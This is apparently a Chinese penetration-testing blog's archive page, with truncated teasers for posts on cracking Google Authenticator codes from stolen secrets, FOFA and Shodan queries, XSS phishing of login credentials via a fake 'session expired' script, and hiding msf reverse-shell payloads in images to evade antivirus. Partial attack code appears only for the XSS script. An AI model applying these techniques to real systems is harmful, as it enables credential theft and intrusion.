谷歌身份验证器动态code破解
想要破解谷歌身份验证器的动态码,需要知道它生成的secret,一般这个值都是存放在数据库中的。至于怎么拿到secret这个值,这里不多缀述。破解方法:保存下列PHP代码到为xxxx.php,之后修改其中的$secret变量为你获取到的...
阅读全文
Archive
Web安全与渗透
fofa curl数据直接用jq取结果集
curl https://fofa.so/api/v1/search/[email protected]&key=xxxxxxxxxxxxxxxx&qbase64=dGl0bGU9IkFwYWNoZSBEcn...
阅读全文
Mac下保存https网站的ssl证书和输出证书详细信息
如果网站是https网站,你想把证书导出来,windows下直接查看证书导出就可以了。mac下更方便,直接拖拽证书到桌面即可。如下操作:那么渗透过程中需要查看该证书下所有对应的DNS记录,例如这样Mac想导出有点麻烦。但是一个命令可以...
阅读全文
利用xss钓指定登陆页面账号密码并发送到邮箱
1.新建一个xss.js文件,内容如下,放在服务器里便于调用var qad = getCookie("qqq");
if (qad==null)
{
//跳转代码
setTimeout(function(){
alert("登陆过期,...
阅读全文
shodan会员版命令行详细使用说明
使用前奏:基于命令行的shodan会员版,首先需要拿到key(登录后账号信息里有),要不然会提示“Error: Please run "shodan init <api key>" before using this co...
阅读全文
使用图片携带msf payload反弹绕过各种AV
#使用说明1.先找一个高清大图片,四位数*四位数 那种以上的jpg或者png高清大图,命名为1.jpg ,低于四位数的高清大图会失败,一般图片大小,大于1M小于2M即可 。2.使用msfvenom生成一个powershell的反弹的p...
阅读全文